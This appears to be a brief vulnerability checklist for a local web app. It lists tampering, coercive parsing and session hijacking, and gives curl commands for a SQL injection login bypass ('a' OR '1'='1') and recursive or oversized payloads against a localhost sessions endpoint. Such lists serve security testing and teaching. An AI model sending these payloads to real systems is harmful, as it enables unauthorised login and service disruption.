Vulnerabilities:
-
Sensitive info saved unencrypted
-
Parameters tampering
- Body params tampering
- Cookie tampering
-
SQL Injection curl --data "email=a' OR '1'='1&password=a' OR '1'='1" http://localhost:3000/sessions.json
-
Coercive Parsing
- Recursive Payloads curl --data @recursive.txt http://localhost:3000/sessions.json
- Oversized Payloads curl --data @oversized.txt http://localhost:3000/sessions.json
- Session Hijacking